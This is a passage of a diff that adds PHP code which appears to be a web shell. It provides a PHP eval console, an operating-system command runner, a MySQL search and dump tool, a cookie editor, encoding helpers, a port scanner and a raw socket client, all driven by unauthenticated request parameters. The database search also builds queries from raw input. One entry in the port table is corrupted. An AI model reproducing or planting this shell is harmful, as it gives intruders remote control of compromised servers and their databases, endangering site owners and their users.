+	foreach (array('Any', 'Each', 'Exact', 'RegExp') as $cur_rad)
+		print '<input type=radio name="dxsqlsearch[mode]" value="'.strtolower($cur_rad).'" '
+			.(  (isset($_POST['dxsqlsearch']['mode']))?   (($_POST['dxsqlsearch']['mode']==strtolower($cur_rad))?'CHECKED':'')   :(($cur_rad=='Any')?'CHECKED':'')  )
+			.' class=radio>'.$cur_rad.'&nbsp;&nbsp;&nbsp;';
+	print "\n".'<div align=right><input type=submit value="Search..." class=submit style="width:100pt;"></div>';
+	print "\n".'</form>';
+
+	if (!isset($_POST['dxsqlsearch'])) die('</td></tr></table>');
+
+	if (empty($_POST['dxsqlsearch']['tables'])) die(DxError('No tables selected'));
+
+	if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'each'))) $_POST['dxsqlsearch']['txt']=explode(' ', mysql_real_escape_string($_POST['dxsqlsearch']['txt']));
+		else $_POST['dxsqlsearch']['txt']=array($_POST['dxsqlsearch']['txt']);
+
+
+	$GLOBALFOUND=0;
+	foreach ($_POST['dxsqlsearch']['tables'] as $CUR_TABLE)
+		{		$Q='SELECT * FROM `'.$CUR_TABLE.'` WHERE ';
+		$Q_ARR=array();
+		DxMySQL_FetchResult(DxMySQLQ('SHOW COLUMNS FROM `'.$CUR_TABLE.'`;', true), $COLS, true);   for ($i=0; $i<count($COLS);$i++) $COLS[$i]=$COLS[$i][0];
+		foreach ($COLS as $CUR_COL)
+			{			if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'each', 'exact')))
+				{				for ($i=0;$i<count($_POST['dxsqlsearch']['txt']);$i++)
+				$Q_ARR[]=$CUR_COL.' LIKE "%'.($_POST['dxsqlsearch']['txt'][$i]).'%"';
+				}
+				else $Q_ARR[]=$CUR_COL.' REGEXP '.$_POST['dxsqlsearch']['txt'][0];
+
+			if ($_POST['dxsqlsearch']['mode']=='each')
+				{				$Q_ARR_EXACT[]=implode(' AND ', $Q_ARR);
+				$Q_ARR=array();
+				}
+			}
+		if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'exact'))) $Q.=implode(' OR ', $Q_ARR).';';
+		if ($_POST['dxsqlsearch']['mode']=='each') $Q.=' ( '.implode(' ) OR ( ', $Q_ARR_EXACT).' );';
+		if ($_POST['dxsqlsearch']['mode']=='regexp') $Q.=' ( '.implode(' ) OR ( ',$Q_ARR).' );';
+
+		/* $Q is ready */
+
+		if (($num=DxMySQL_FetchResult(DxMySQLQ($Q, true), $FETCHED, true))>0)
+			{
+			$GLOBALFOUND+=$num;			print "\n\n".'<table border=0 cellspacing=0 cellpadding=0 align=center><caption>'.$num.' matched in '.$CUR_TABLE.' :</caption>';
+			print "\n\t".'<tr><td class=listing><font class="highlight_txt">'.implode('</td><td class=listing><font class="highlight_txt">', $COLS).'</td></tr>';
+			for ($l=0;$l<count($FETCHED);$l++)
+				{
+				print "\n\t".'<tr>';
+				for ($i=0; $i<count($FETCHED[$l]); $i++) print '<td class="listing"> '.DxDecorVar($FETCHED[$l][$i], true).'</td>';
+				print '</tr>';
+				}
+			print "\n".'</table><br>';
+			}
+		}
+	print "\n".'<br>Total: '.$GLOBALFOUND.' matches';
+
+	print "\n".'</td></tr></table>';
+	}
+
+########
+########   SQL Dump
+########
+if ($_GET['dxmode']=='SQLD')
+	{	if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'], $_GET['dxsql_d']))	die(DxError('SQL server/login/password/database are not set'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+		else print '&gt;&gt; MySQL connected!';
+
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0><tr><td class=h2_oneline><h2>DB:</h2></td>';
+	print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td></tr></table>';
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>';
+	print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">';
+
+	DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true);
+	for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0];
+	asort($TABLES);
+
+	print "\n\t".'<SELECT MULTIPLE name="dxsql_tables[]" SIZE=30>';
+	for ($i=0;$i<count($TABLES);$i++)
+		{
+		DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true);
+		if ($TRowCnt[0][0]>0)
+			print "\n\t".'<OPTION value="'.$TABLES[$i].'" SELECTED>'.$TABLES[$i].'</OPTION>';
+		}
+	print "\n\t".'</SELECT>';
+	print "\n".'</td><td  width=100%>You can set a pre-dump-query(s) (ex: SET NAMES cp1251; ):';
+	print "\n".'<input type=text name="dxsql_q" style="width:100%;">';
+	print "\n".'<br>';
+	print "\n".'<div align=right>'
+		.'GZIP <input type=checkbox name="dx_gzip" value="Yeah, baby">'.str_repeat('&nbsp;', 10)
+		.'<input type=submit value="Dump!" class=submit style="width:100pt;"></div>';
+	print "\n".'</form>';
+	}
+
+		###################################
+
+########
+########   PHP Console
+########
+if ($_GET['dxmode']=='PHP')
+	{
+	if (isset($_GET['dxval'])) $_POST['dxval']=$_GET['dxval'];
+
+	print "\n".'<table border=0 align=right><tr><td class=h2_oneline>Do</td><td class="linelisting">';
+	$PRESETS=array_keys($GLOB['VAR']['PHP']['Presets']);
+	for ($i=0; $i<count($PRESETS);$i++)
+		print "\n\t".'<a href="'.DxURL('leave', 'dxmode').'&dxval=dxpreset__'.$PRESETS[$i].'" class=no>['.$PRESETS[$i].']</a>'
+						.(  ($i==(count($PRESETS)-1))?'':str_repeat('&nbsp;',3)  );
+	print "\n\n".'</td></tr></table><br><br>';
+
+	if (isset($_POST['dxval']))
+		if (strpos($_POST['dxval'], 'dxpreset__')===0)
+			{			$_POST['dxval']=substr($_POST['dxval'], strlen('dxpreset__'));
+			if (!isset($GLOB['VAR']['PHP']['Presets'][$_POST['dxval']])) die(DxError('Undeclared preset'));
+			$_POST['dxval']=$GLOB['VAR']['PHP']['Presets'][$_POST['dxval']];
+			}
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<textarea name="dxval" rows=15 style="width:100%;">'.((isset($_POST['dxval']))?$_POST['dxval']:'').'</textarea>';
+	print "\n".'<div align=right><input type=submit value="Eval" class="submit" style="width:200pt;"></div>';
+	print "\n".'</form>';
+	if (isset($_POST['dxval']))
+		{		print str_repeat("\n", 10).'<!--php_eval-->'."\n\n".'<table border=0 width=100%><tr><td class=listing>'."\n\n";
+		eval($_POST['dxval']);
+		print str_repeat("\n", 10).'<!--/php_eval-->'.'</td></tr></table>';
+		}
+	}
+
+		###################################
+
+########
+########  Cookies Maintenance
+########
+if ($_GET['dxmode']=='COOK')
+	{
+	if ($DXGLOBALSHIT) DxWarning('Set cookie may fail. This is because "'.basename($_SERVER['PHP_SELF']).'" has fucked up the output with it\'s shit =(');	print 'Found <font class="highlight_txt">'.($CNT=count($_COOKIE)).' cookie'.(($CNT==1)?'':'s');
+
+	print "\n".'<div align=right><a href="'.DxURL('leave', '').'">[RELOAD]</a></div>';
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table border=0 align=center><tr><td class=linelisting><div align=center><font class="highlight_txt">Cookie name</td><td class=linelisting><div align=center><font class="highlight_txt">Value</td></tr>';
+	for ($look_len=1, $maxlen=0; $look_len>=0;$look_len--)
+		{
+		if ($maxlen>100) $maxlen=100;
+		if ($maxlen<30) $maxlen=30;
+		$maxlen+=3;
+		for ($INDEXES=array_keys($_COOKIE), $i=0;$i<count($INDEXES);$i++)
+			{
+			if ($look_len) {if (strlen($_COOKIE[ $INDEXES[$i] ])>$maxlen) {$maxlen=strlen($_COOKIE[ $INDEXES[$i] ]);} continue;}
+			print "\n".'<tr><td class=linelisting>'.$INDEXES[$i].'</td>'
+					.'<td class=linelisting><input type=text '
+							.'name="dxparam['.str_replace(array('"', "\n", "\r", "\t"),  array('&quot;',' ',' ',' '), $INDEXES[$i]).']" '
+							.'value="'.str_replace(array('"', "\n", "\r", "\t"), array('&quot;',' ',' ',' '), $_COOKIE[ $INDEXES[$i] ]).'" '
+							.'SIZE='.$maxlen.'></td>'
+					.'</tr>';
+			}
+		if (!$look_len)
+			{
+			print "\n".'<tr><td colspan=2><div align=center>[Set new cookie]</td></tr>';
+			print "\n".'<tr><td class=linelisting><input type=text name="dxparam[DXS_NEWCOOK][NAM]" value="" style="width:99%;"></td>'
+					.'<td class=linelisting><input type=text name="dxparam[DXS_NEWCOOK][VAL]" value="" SIZE='.$maxlen.'></td>'
+					.'</tr>';			print "\n".'<tr><td class=linelisting colspan=2 style="text-align:center;">'
+					.'<input type=submit value="Save" class="submit" style="width:50%;">'
+					.'</td></tr>';
+			}
+		}
+	print "\n".'</table></form>';
+	}
+
+		###################################
+
+########
+########   Command line
+########
+if ($_GET['dxmode']=='CMD')
+	{
+	print "\n".'<table border=0 align=right><tr><td class=h2_oneline>Do</td><td>';
+	print "\n".'<SELECT name="selector" onchange="document.getElementById(\'dxval\').value+=document.getElementById(\'selector\').value+\'\n\'" style="width:200pt;">';
+	print "\n\t".'<OPTION></OPTION>';
+	$PRESETS=array_keys($GLOB['VAR']['CMD']['Presets']);
+	for ($i=0; $i<count($PRESETS);$i++)
+		print "\n\t".'<OPTION value="'.str_replace('"','&quot;',$GLOB['VAR']['CMD']['Presets'][ $PRESETS[$i] ]).'">'.$PRESETS[$i].'</OPTION>';
+	print "\n\n".'</SELECT></td></tr></table><br><br>';
+
+	if (isset($_POST['dxval']))
+		if (strpos($_POST['dxval'], 'dxpreset__')===0)
+			{
+			$_POST['dxval']=substr($_POST['dxval'], strlen('dxpreset__'));
+			if (!isset($GLOB['VAR']['CMD']['Presets'][$_POST['dxval']])) die(DxError('Undeclared preset'));
+			$_POST['dxval']=$GLOB['VAR']['CMD']['Presets'][$_POST['dxval']];
+			}
+
+	$warnstr=DxExecNahuj('',$trash1, $trash2);
+	if (!$warnstr[1]) DxWarning($warnstr[2]);	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<textarea name="dxval" rows=5 style="width:100%;">'.((isset($_POST['dxval']))?$_POST['dxval']:'').'</textarea>';
+	print "\n".'<div align=right>'
+				.'<input type=submit value="Exec" class="submit" style="width:100pt;"> '
+				.'</div>';
+	print "\n".'</form>';
+	if (isset($_POST['dxval']))
+		{
+		$_POST['dxval']=split("\n", str_replace("\r", '', $_POST['dxval']));
+		for ($i=0; $i<count($_POST['dxval']); $i++)
+			{
+			$CUR=$_POST['dxval'][$i];
+			if (empty($CUR)) continue;
+
+			DxExecNahuj($CUR,$OUT, $RET);
+			print str_repeat("\n", 10).'<!--'.$warnstr[2].'("'.$CUR.'")-->'."\n\n".'<table border=0 width=100%><tr><td class=listing>'."\n\n";
+
+			print '<span style="position:absolute;left:10%;" class="highlight_txt">Return</span>';
+			print '<span style="position:absolute;right:30%;" class="highlight_txt">Output</span>';
+			print '<br><nobr>';
+			print "\n".'<textarea rows=10 style="width:20%;display:inline;">'.$CUR."\n\n".(	(is_array($RET))?implode("\n", $RET):$RET).'</textarea>';
+			print "\n".'<textarea rows=10 style="width:79%;display:inline;">'."\n".(	(is_array($OUT))?implode("\n", $OUT):$OUT).'</textarea>';
+			print '</nobr>';
+			print str_repeat("\n", 10).'<!--/'.$warnstr[2].'("'.$CUR.'")-->'."\n\n".'</td></tr></table>';
+			}
+		}
+	}
+
+		###################################
+
+########
+########   String functions
+########
+if ($_GET['dxmode']=='STR')
+	{
+	if (isset($_POST['dxval'], $_POST['dxparam']))
+		{		$crypted='';
+		if ($_POST['dxparam']=='md5') $crypted.=md5($_POST['dxval']);
+		if ($_POST['dxparam']=='sha1') $crypted.=sha1($_POST['dxval']);
+		if ($_POST['dxparam']=='crc32') $crypted.=crc32($_POST['dxval']);
+		if ($_POST['dxparam']=='2base') $crypted.=base64_encode($_POST['dxval']);
+		if ($_POST['dxparam']=='base2') $crypted.=base64_decode($_POST['dxval']);
+		if ($_POST['dxparam']=='2HEX') for ($i=0;$i<strlen($_POST['dxval']);$i++) $crypted.=strtoupper(dechex(ord($_POST['dxval'][$i]))).' ';
+		if ($_POST['dxparam']=='HEX2') {$_POST['dxval']=str_replace(' ','',$_POST['dxval']); for ($i=0;$i<strlen($_POST['dxval']);$i+=2) $crypted.=chr(hexdec($_POST['dxval'][$i].$_POST['dxval'][$i+1]));}
+		if ($_POST['dxparam']=='2DEC') {$crypted='CHAR('; for ($i=0;$i<strlen($_POST['dxval']); $i++) $crypted.=ord($_POST['dxval'][$i]).(($i<(strlen($_POST['dxval'])-1))?',':')');}
+		if ($_POST['dxparam']=='2URL') $crypted.=urlencode($_POST['dxval']);
+		if ($_POST['dxparam']=='URL2') $crypted.=urldecode($_POST['dxval']);
+		}
+	if (isset($crypted)) print $_POST['dxparam'].'(<font class="highlight_txt"> '.$_POST['dxval'].' </font>) = ';
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<textarea name="dxval" rows=20 style="width:100%;">'.((isset($crypted))?$crypted:'').'</textarea>';
+	print "\n".'<div align=right>'
+		.'<input type=submit name="dxparam" value="md5" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="sha1" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="crc32" class="submit" style="width:50pt;"> '.str_repeat('&nbsp;', 5)
+		.'<input type=submit name="dxparam" value="2base" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="base2" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="2HEX" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="HEX2" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="2DEC" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="2URL" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="URL2" class="submit" style="width:50pt;"> '
+		.'</div>';
+	print "\n".'</form>';
+	}
+
+########
+########   Port scaner
+########
+if ($_GET['dxmode']=='PRT')
+	{
+	print '[!] For complete portlist go to <a href="http://www.iana.org/assignments/port-numbers" target=_blank>http://www.iana.org/assignments/port-numbers</a>';	if (isset($_POST['dxportscan']) or isset($_GET['dxparam']))
+		$DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Utility',3=>'Compression Process',5=>'rje (Remote Job Entry)',7=>'echo',9=>'discard',11=>'systat',13=>'daytime',15=>'netstat',17=>'quote of the day',18=>'send/rwp',19=>'character generator',20=>'ftp-data',21=>'ftp',22=>'ssh, pcAnywhere',23=>'Telnet',25=>'SMTP (Simple Mail Transfer)',27=>'ETRN (NSW User System FE)',29=>'MSG ICP',31=>'MSG Authentication',33=>'dsp (Display Support Protocol)',37=>'time',38=>'RAP (Route Access Protocol)',39=>'rlp (Resource Location Protocol)',41=>'Graphics',42=>'nameserv, WINS',43=>'whois, nickname',44=>'MPM FLAGS Protocol',45=>'Message Processing Module [recv]',46=>'MPM [default send]',47=>'NI FTP',48=>'Digital Audit Daemon',49=>'TACACS, Login Host Protocol',50=>'RMCP, re-mail-ck',53=>'DNS',57=>'MTP (any private terminal access)',59=>'NFILE',60=>'Unassigned',61=>'NI MAIL',62=>'ACA Services',63=>'whois++',64=>'Communications Integrator (CI)',65=>'TACACS-Database Service',66=>'Oracle SQL*NET',67=>'bootps (Bootstrap Protocol Server)',68=>'bootpd/dhcp (Bootstrap Protocol Client)',69=>'Trivial File Transfer Protocol (tftp)',70=>'Gopher',71=>'Remote Job Service',72=>'Remote Job Service',73=>'Remote Job Service',74=>'Remote Job Service',75=>'any private dial out service',76=>'Distributed External Object Store',77=>'any private RJE service',78=>'vettcp',79=>'finger',80=>'World Wide Web HTTP',81=>'HOSTS2 Name Serve',82=>'XFER Utility',83=>'MIT ML Device',84=>'Common Trace Facility',85=>'MIT ML Device',86=>'Micro Focus Cobol',87=>'any private terminal link',88=>'Kerberos, WWW',89=>'SU/MIT Telnet Gateway',90=>'DNSIX Securit Attribute Token Map',91=>'MIT Dover Spooler',92=>'Network Printing Protocol',93=>'Device Control Protocol',94=>'Tivoli Object Dispatcher',95=>'supdup',96=>'DIXIE',98=>'linuxconf',99=>'Metagram Relay',100=>'[unauthorized use]',101=>'HOSTNAME',102=>'ISO, X.400, ITOT',103=>'Genesis Point-to&#14144;&#429;oi&#65535;&#65535; T&#0;&#0;ns&#0;&#0;et',104=>'ACR-NEMA Digital Imag. & Comm. 300',105=>'CCSO name server protocol',106=>'poppassd',107=>'Remote Telnet Service',108=>'SNA Gateway Access Server',109=>'POP2',110=>'POP3',111=>'Sun RPC Portmapper',112=>'McIDAS Data Transmission Protocol',113=>'Authentication Service',115=>'sftp (Simple File Transfer Protocol)',116=>'ANSA REX Notify',117=>'UUCP Path Service',118=>'SQL Services',119=>'NNTP',120=>'CFDP',123=>'NTP',124=>'SecureID',129=>'PWDGEN',133=>'statsrv',135=>'loc-srv/epmap',137=>'netbios-ns',138=>'netbios-dgm (UDP)',139=>'NetBIOS',143=>'IMAP',144=>'NewS',150=>'SQL-NET',152=>'BFTP',153=>'SGMP',156=>'SQL Service',161=>'SNMP',175=>'vmnet',177=>'XDMCP',178=>'NextStep Window Server',179=>'BGP',180=>'SLmail admin',199=>'smux',210=>'Z39.50',213=>'IPX',218=>'MPP',220=>'IMAP3',256=>'RAP',257=>'Secure Electronic Transaction',258=>'Yak Winsock Personal Chat',259=>'ESRO',264=>'FW1_topo',311=>'Apple WebAdmin',350=>'MATIP type A',351=>'MATIP type B',363=>'RSVP tunnel',366=>'ODMR (On-Demand Mail Relay)',371=>'Clearcase',387=>'AURP (AppleTalk Update-Based Routing Protocol)',389=>'LDAP',407=>'Timbuktu',427=>'Server Location',434=>'Mobile IP',443=>'ssl',444=>'snpp, Simple Network Paging Protocol',445=>'SMB',458=>'QuickTime TV/Conferencing',468=>'Photuris',475=>'tcpnethaspsrv',500=>'ISAKMP, pluto',511=>'mynet-as',512=>'biff, rexec',513=>'who, rlogin',514=>'syslog, rsh',515=>'lp, lpr, line printer',517=>'talk',520=>'RIP (Routing Information Protocol)',521=>'RIPng',522=>'ULS',531=>'IRC',543=>'KLogin, AppleShare over IP',545=>'QuickTime',548=>'AFP',554=>'Real Time Streaming Protocol',555=>'phAse Zero',563=>'NNTP over SSL',575=>'VEMMI',581=>'Bundle Discovery Protocol',593=>'MS-RPC',608=>'SIFT/UFT',626=>'Apple ASIA',631=>'IPP (Internet Printing Protocol)',635=>'RLZ DBase',636=>'sldap',642=>'EMSD',648=>'RRP (NSI Registry Registrar Protocol)',655=>'tinc',660=>'Apple MacOS Server Admin',666=>'Doom',674=>'ACAP',687=>'AppleShare IP Registry',700=>'buddyphone',705=>'AgentX for SNMP',901=>'swat, realsecure',993=>'s-imap',995=>'s-pop',1024=>'Reserved',1025=>'network blackjack',1062=>'Veracity',1080=>'SOCKS',1085=>'WebObjects',1227=>'DNS2Go',1243=>'SubSeven',1338=>'Millennium Worm',1352=>'Lotus Notes',1381=>'Apple Network License Manager',1417=>'Timbuktu Service 1 Port',1418=>'Timbuktu Service 2 Port',1419=>'Timbuktu Service 3 Port',1420=>'Timbuktu Service 4 Port',1433=>'Microsoft SQL Server',1434=>'Microsoft SQL Monitor',1477=>'ms-sna-server',1478=>'ms-sna-base',1490=>'insitu-conf',1494=>'Citrix ICA Protocol',1498=>'Watcom-SQL',1500=>'VLSI License Manager',1503=>'T.120',1521=>'Oracle SQL',1522=>'Ricardo North America License Manager',1524=>'ingres',1525=>'prospero',1526=>'prospero',1527=>'tlisrv',1529=>'oracle',1547=>'laplink',1604=>'Citrix ICA, MS Terminal Server',1645=>'RADIUS Authentication',1646=>'RADIUS Accounting',1680=>'Carbon Copy',1701=>'L2TP/LSF',1717=>'Convoy',1720=>'H.323/Q.931',1723=>'PPTP control port',1731=>'MSICCP',1755=>'Windows Media .asf',1758=>'TFTP multicast',1761=>'cft-0',1762=>'cft-1',1763=>'cft-2',1764=>'cft-3',1765=>'cft-4',1766=>'cft-5',1767=>'cft-6',1808=>'Oracle-VP2',1812=>'RADIUS server',1813=>'RADIUS accounting',1818=>'ETFTP',1973=>'DLSw DCAP/DRAP',1985=>'HSRP',1999=>'Cisco AUTH',2001=>'glimpse',2049=>'NFS',2064=>'distributed.net',2065=>'DLSw',2066=>'DLSw',2106=>'MZAP',2140=>'DeepThroat',2301=>'Compaq Insight Management Web Agents',2327=>'Netscape Conference',2336=>'Apple UG Control',2427=>'MGCP gateway',2504=>'WLBS',2535=>'MADCAP',2543=>'sip',2592=>'netrek',2727=>'MGCP call agent',2628=>'DICT',2998=>'ISS Real Secure Console Service Port',3000=>'Firstclass',3001=>'Redwood Broker',3031=>'Apple AgentVU',3128=>'squid',3130=>'ICP',3150=>'DeepThroat',3264=>'ccmail',3283=>'Apple NetAssitant',3288=>'COPS',3305=>'ODETTE',3306=>'mySQL',3389=>'RDP Protocol (Terminal Server)',3521=>'netrek',4000=>'icq, command-n-conquer and shell nfm',4321=>'rwhois',4333=>'mSQL',4444=>'KRB524',4827=>'HTCP',5002=>'radio free ethernet',5004=>'RTP',5005=>'RTP',5010=>'Yahoo! Messenger',5050=>'multimedia conference control tool',5060=>'SIP',5150=>'Ascend Tunnel Management Protocol',5190=>'AIM',5500=>'securid',5501=>'securidprop',5423=>'Apple VirtualUser',5555=>'Personal Agent',5631=>'PCAnywhere data',5632=>'PCAnywhere',5678=>'Remote Replication Agent Connection',5800=>'VNC',5801=>'VNC',5900=>'VNC',5901=>'VNC',6000=>'X Windows',6112=>'BattleNet',6502=>'Netscape Conference',6667=>'IRC',6670=>'VocalTec Internet Phone, DeepThroat',6699=>'napster',6776=>'Sub7',6970=>'RTP',7007=>'MSBD, Windows Media encoder',7070=>'RealServer/QuickTime',7777=>'cbt',7778=>'Unreal',7648=>'CU-SeeMe',7649=>'CU-SeeMe',8000=>'iRDMI/Shoutcast Server',8010=>'WinGate 2.1',8080=>'HTTP',8181=>'HTTP',8383=>'IMail WWW',8875=>'napster',8888=>'napster',8889=>'Desktop Data TCP 1',8890=>'Desktop Data TCP 2',8891=>'Desktop Data TCP 3: NESS application',8892=>'Desktop Data TCP 4: FARM product',8893=>'Desktop Data TCP 5: NewsEDGE/Web application',8894=>'Desktop Data TCP 6: COAL application',9000=>'CSlistener',10008=>'cheese worm',11371=>'PGP 5 Keyserver',13223=>'PowWow',13224=>'PowWow',14237=>'Palm',14238=>'Palm',18888=>'LiquidAudio',21157=>'Activision',22555=>'Vocaltec Web Conference',23213=>'PowWow',23214=>'PowWow',23456=>'EvilFTP',26000=>'Quake',27001=>'QuakeWorld',27010=>'Half-Life',27015=>'Half-Life',27960=>'QuakeIII',30029=>'AOL Admin',31337=>'Back Orifice',32777=>'rpc.walld',45000=>'Cisco NetRanger postofficed',32773=>'rpc bserverd',32776=>'rpc.spray',32779=>'rpc.cmsd',38036=>'timestep',40193=>'Novell',41524=>'arcserve discovery',);
+
+	if (isset($_GET['dxparam']))
+		{		print "\n".'<table><tr><td class=listing colspan=2><h2>#Scan main will scan these '.count($DEF_PORTS).' ports:</td></tr>';
+		$INDEXES=array_keys($DEF_PORTS);
+		for ($i=0;$i<count($INDEXES);$i++)
+			print "\n".'<tr><td width=40 class=listing style="text-align:right;">'.$INDEXES[$i].'</td><td class=listing>'.$DEF_PORTS[ $INDEXES[$i] ].'</td></tr>';
+		print "\n".'</table>';
+		die();
+		}
+
+	if (isset($_POST['dxportscan']))
+		{		$OKAY_PORTS = 0;
+		$TOSCAN=array();
+
+		if ($_POST['dxportscan']['ports']=='#default') $TOSCAN=array_keys($DEF_PORTS);
+			else
+			{			$_POST['dxportscan']['ports']=explode(',',$_POST['dxportscan']['ports']);
+			for ($i=0;$i<count($_POST['dxportscan']['ports']);$i++)
+				{				$_POST['dxportscan']['ports'][$i]=explode('-',$_POST['dxportscan']['ports'][$i]);
+				if (count($_POST['dxportscan']['ports'][$i])==1) $TOSCAN[]=$_POST['dxportscan']['ports'][$i][0];
+					else
+					$TOSCAN+=range($_POST['dxportscan']['ports'][$i][0], $_POST['dxportscan']['ports'][$i][1]);
+				$_POST['dxportscan']['ports'][$i]=implode('-', $_POST['dxportscan']['ports'][$i]);
+				}
+			$_POST['dxportscan']['ports']=implode(',',$_POST['dxportscan']['ports']);
+			}
+
+		print "\n".'<table><tr><td colspan=2><font class="highlight_txt">Opened ports:</td></tr>';
+		list($usec, $sec) = explode(' ', microtime());
+		$start=(float)$usec + (float)$sec;
+		for ($i=0;$i<count($TOSCAN);$i++)
+			{			$cur_port=&$TOSCAN[$i];
+			$fp=@fsockopen($_POST['dxportscan']['host'], $cur_port, $e, $e, (float)$_POST['dxportscan']['timeout']);
+			if ($fp)
+				{				$OKAY_PORTS++;
+				$port_name='';
+				if (isset($DEF_PORTS[$cur_port])) $port_name=$DEF_PORTS[$cur_port];
+				print "\n".'<tr><td width=50 class=listing style="text-align:right;">'.$cur_port.'</td><td class=listing>'.$port_name.'</td><td class=listing>'.getservbyport($cur_port, 'tcp').'</td></tr>';
+				}
+			}
+		list($usec, $sec) = explode(' ', microtime());
+		$end=(float)$usec + (float)$sec;
+
+		print "\n".'</table>';
+		print "\n".'<font class="highlight_txt">Scanned '.count($TOSCAN).', '.$OKAY_PORTS.' opened. Time: '.($end-$start).'</font>';
+		print "\n".'<br><hr>'."\n";
+		}
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table border=0>'
+		.'<tr>'
+			.'<td colspan=2>'
+			.'<input type=text name="dxportscan[host]" value="'.((isset($_POST['dxportscan']['host']))?$_POST['dxportscan']['host'].'"':'127.0.0.1"').' SIZE=30>'
+			.'<input type=text name="dxportscan[timeout]" value="'.((isset($_POST['dxportscan']['timeout']))?$_POST['dxportscan']['timeout'].'"':'0.1"').' SIZE=10>'
+		.'</tr><tr>'
+			.'<td><textarea name="dxportscan[ports]" rows=3 cols=50>'.((isset($_POST['dxportscan']['ports']))?$_POST['dxportscan']['ports']:'21-25,35,80,3306').'</textarea>'
+			.'</td><td>'
+				.'<input type=checkbox name="dxportscan[ports]" value="#default"><a '.DxDesign_DrawBubbleBox('', 'To learn out what "main ports" are, click here', 300).' href="'.DxURL('kill','dxparam').'&dxparam=main_legend">#Scan main</a>'
+				.'<br><input type=submit value="Scan" class="submit" style="width:100pt;">'
+		.'</tr></table></form>';
+	}
+
+########
+########   Raw s0cket
+########
+if ($_GET['dxmode']=='SOCK')
+	{
+	$DEFQUERY=DxHTTPMakeHeaders('GET', '/index.php?get=q&get2=d', 'www.microsoft.com', 'DxS Browser', 'http://referer.com/', array('post_val' => 'Yeap'), array('cookiename' => 'val'));
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';	print "\n".'<table width=100% cellspacing=0 celpadding=0>';
+	print "\n".'<tr><td class=linelisting colspan=2 width=100%><input type=text name="dxsock_host" value="'.( (isset($_POST['dxsock_host'])?$_POST['dxsock_host']:'www.microsoft.com') ).'" style="width:100%;">';
+	print "\n".'</td><td class=linelisting><nobr><input type=text name="dxsock_port" value="'.( (isset($_POST['dxsock_port'])?$_POST['dxsock_port']:'80') ).'" SIZE=10>'
+			.' timeout <input type=text name="dxsock_timeout" value="'.( (isset($_POST['dxsock_timeout'])?$_POST['dxsock_timeout']:'1.0') ).'" SIZE=4></td></tr>';
+	print "\n".'<tr><td class=linelisting colspan=3>'
+			.'<textarea ROWS=15 name="dxsock_request" style="width:100%;">'.( (isset($_POST['dxsock_request'])?$_POST['dxsock_request']:$DEFQUERY) ).'</textarea>'
+			.'</td></tr>';
+	print "\n".'<tr>'
+		.'<td class=linelisting width=50pt><input type=radio name="dxsock_type" value="HTML" '.( (isset($_POST['dxsock_type'])?	(($_POST['dxsock_type']=='HTML')?'CHECKED':'')	:'CHECKED') ).'>HTML</td>'
+		.'<td class=linelisting width=50pt><input type=radio name="dxsock_type" value="TEXT" '.( (isset($_POST['dxsock_type'])?	(($_POST['dxsock_type']=='TEXT')?'CHECKED':'') :'') ).'>TEXT</td>'
+		.'<td class=linelisting width=100%><div align=right><input type=submit class=submit value="Send" style="width:100pt;height:20pt;"></td>'
+		.'</tr>';
+	print "\n".'</table>';
+
+	if (!isset($_POST['dxsock_host'], $_POST['dxsock_port'], $_POST['dxsock_timeout'], $_POST['dxsock_request'], $_POST['dxsock_type'])) die();
+
+	print "\n".'<table width=100% cellspacing=0 celpadding=0>';
+	print "\n".'<tr><td class=listing><pre><font class=highlight_txt>'.$_POST['dxsock_request'].'</font></pre></td></tr>';
+	print "\n\n\n".'<tr><td class=listing>';
+
+	$fp=@fsockopen($_POST['dxsock_host'], $_POST['dxsock_port'], $errno, $errstr, (float)$_POST['dxsock_timeout']);
+	if (!$fp) die(DxError('Sock #'.$errno.' : '.$errstr));
+
+	if ($_POST['dxsock_type']=='TEXT') print '<plaintext>';
+
+	if (!empty($_POST['dxsock_request']))	fputs($fp, $_POST['dxsock_request']);
+	$ret='';
+	while (!feof($fp)) $ret.=fgets($fp, 4096 );
+	fclose( $fp );
+
